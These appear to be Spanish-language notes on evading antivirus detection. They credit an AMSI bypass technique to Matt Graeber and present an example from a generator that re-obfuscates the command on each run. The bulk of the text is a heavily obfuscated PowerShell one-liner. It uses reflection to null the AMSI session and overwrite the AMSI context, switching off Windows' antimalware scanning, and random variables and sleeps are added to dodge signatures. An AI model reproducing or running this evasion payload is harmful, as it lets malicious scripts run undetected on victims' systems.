# Para poder Bypassear este tipo de firmas y que el antivirus no lo detecte tendremos que estar muy al dia para poder 
# ver las nuevas vulnerabilidades que puede salir para poder bypassear esto, ya que cuando salgan dichas 
# vulnerabilidades Microsoft u otras empresas pondran el parche de las mismas, por lo que tendremos un tiempo reducido 
# para aprovecharlas, pero hay una pagina con una tecnica que presento un investigador llamado Matt Graeber

# Lo que hace esto es que cada vez que le damos a generar nos genera el mismo comando anterior pero de forma ofuscada, 
# pero va cambiando la forma de ofuscarlo cada vez que pulsamos, por lo que podremos bypassear esa firma de Windows

EJEMPLO:

(PowerShell)

$ $o1XOo_au6zlBn_AI=$null;$tK2D_zyBfxhkVHI=[System.Runtime.InteropServices.Marshal]::AllocHGlobal((9076+4250-4250));$uwiiheyxryrusrapee="+('b'+'ú').nORmALiZe([cHaR]([bYtE]0x46)+[CHar](111)+[CHar]([byTe]0x72)+[CHAr](109+23-23)+[chAr](41+27)) -replace [chAR](92)+[CHar]([Byte]0x70)+[chAr]([bYtE]0x7b)+[char](77)+[CHAR]([BYTE]0x6e)+[Char](125)";[Threading.Thread]::Sleep(882);[Ref].Assembly.GetType("System.$([CHar](77)+[chAr]([BYTE]0x61)+[chaR]([Byte]0x6e)+[chAr]([bytE]0x61)+[CHAr](46+57)+[CHAR](101+32-32)+[CHAr](34+75)+[CHAR](101*43/43)+[ChaR]([ByTE]0x6e)+[ChAr](116*67/67)).$([char](65+35-35)+[chAR]([byTe]0x75)+[chAR](116+36-36)+[char](111)+[chaR](109*11/11)+[chaR](97)+[ChAr]([bYTe]0x74)+[chAR](105*75/75)+[CHaR](111+43-43)+[chAR]([bYTe]0x6e)).$(('Àms'+'íÚt'+'íls').noRMalIzE([cHAR](70*34/34)+[char](111)+[cHAR]([byTE]0x72)+[chAR]([bYte]0x6d)+[ChAR]([ByTe]0x44)) -replace [char](92+53-53)+[CHaR](82+30)+[CHar](100+23)+[Char](77+58-58)+[CHAr]([BYtE]0x6e)+[ChAr]([bytE]0x7d))").GetField("$(('àms'+'îSê'+'ssî'+'õn').nORMaLIze([cHar]([bYtE]0x46)+[char]([Byte]0x6f)+[cHar]([BYTe]0x72)+[cHAr]([byTE]0x6d)+[ChAR](68*52/52)) -replace [ChAr]([BYtE]0x5c)+[cHAr]([ByTe]0x70)+[CHAR](123*79/79)+[char](77)+[chAR](110)+[chAR]([bYte]0x7d))", "NonPublic,Static").SetValue($o1XOo_au6zlBn_AI, $o1XOo_au6zlBn_AI);[Ref].Assembly.GetType("System.$([CHar](77)+[chAr]([BYTE]0x61)+[chaR]([Byte]0x6e)+[chAr]([bytE]0x61)+[CHAr](46+57)+[CHAR](101+32-32)+[CHAr](34+75)+[CHAR](101*43/43)+[ChaR]([ByTE]0x6e)+[ChAr](116*67/67)).$([char](65+35-35)+[chAR]([byTe]0x75)+[chAR](116+36-36)+[char](111)+[chaR](109*11/11)+[chaR](97)+[ChAr]([bYTe]0x74)+[chAR](105*75/75)+[CHaR](111+43-43)+[chAR]([bYTe]0x6e)).$(('Àms'+'íÚt'+'íls').noRMalIzE([cHAR](70*34/34)+[char](111)+[cHAR]([byTE]0x72)+[chAR]([bYte]0x6d)+[ChAR]([ByTe]0x44)) -replace [char](92+53-53)+[CHaR](82+30)+[CHar](100+23)+[Char](77+58-58)+[CHAr]([BYtE]0x6e)+[ChAr]([bytE]0x7d))").GetField("$(('ã'+'m'+'s'+'ì'+'C'+'ô'+'n'+'t'+'è'+'x'+'t').nOrMalizE([CHar](70+26-26)+[ChAR](111*40/40)+[Char]([bYTE]0x72)+[chAr](13+96)+[ChAR](68+35-35)) -replace [CHAr]([bYTe]0x5c)+[CHAR]([byTE]0x70)+[cHaR]([ByTE]0x7b)+[CHAR]([byte]0x4d)+[CHAR]([BYtE]0x6e)+[cHaR]([BYTE]0x7d))", "NonPublic,Static").SetValue($o1XOo_au6zlBn_AI, [IntPtr]$tK2D_zyBfxhkVHI);$eypibgevvbsp="+[ChaR]([byTe]0x77)+[Char]([Byte]0x66)+[chaR](121+13-13)+[ChaR]([Byte]0x6f)+[CHAR](113)+[chaR](116+35-35)+[ChAR]([bYTE]0x76)+[CHar](122*25/25)+[cHAr](101+94-94)+[CHar]([BYtE]0x64)+[cHAR]([bYte]0x6c)+[chaR](119*6/6)+[CHar](76+43)+[CHAr](103)+[chAr]([byTE]0x72)+[Char](114+12-12)+[CHAr](118+20-20)";[Threading.Thread]::Sleep(818)

